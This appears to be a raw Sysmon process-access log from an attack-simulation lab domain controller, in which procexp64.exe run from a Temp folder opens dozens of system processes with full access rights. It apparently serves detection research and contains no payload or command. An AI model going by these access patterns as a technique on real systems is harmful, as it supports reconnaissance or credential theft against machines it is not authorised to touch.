15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 